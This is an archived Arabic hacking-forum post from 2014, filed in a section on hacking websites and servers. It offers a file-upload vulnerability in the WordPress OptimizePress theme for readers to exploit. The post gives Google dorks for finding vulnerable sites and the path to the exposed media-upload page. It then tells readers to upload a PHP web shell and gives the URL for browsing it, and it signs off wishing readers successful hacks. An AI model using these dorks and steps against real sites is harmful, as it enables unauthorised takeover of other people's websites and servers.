:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   WordPress OptimizePress Themes File Upload Vulnerability (http://www.vbspiders.com/vb/t68836.html)

Twi[L]ighT Dz 02-06-2014 12:12 AM
WordPress OptimizePress Themes File Upload Vulnerability
 
أقدم لكم ثغرة
WordPress OptimizePress Themes File Upload Vulnerability

الدورك :


كود:

inurl:/wp-content/themes/OptimizePress/
inurl:/wp-content/uploads/optpress/

إبحث في google
بواسطة الدوركات ثم إذهب إلى الآتي

كود:

http://127.0.0.1/wp-content/themes/OptimizePress/lib/admin/media-upload.php
إذا رأيت الصفحة التالية فالموقع
مصاب بالثغرة

http://s9.postimg.org/vvotmgm73/image.png

و ما عليك الآن إلا برفع الشل shell.php


و لتصفح الشل


كود:

http://127.0.0.1/wp-content/uploads/optpress/images_comingsoon/yourshell.php
سلام إختراقات موفقة


الساعة الآن 07:26 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0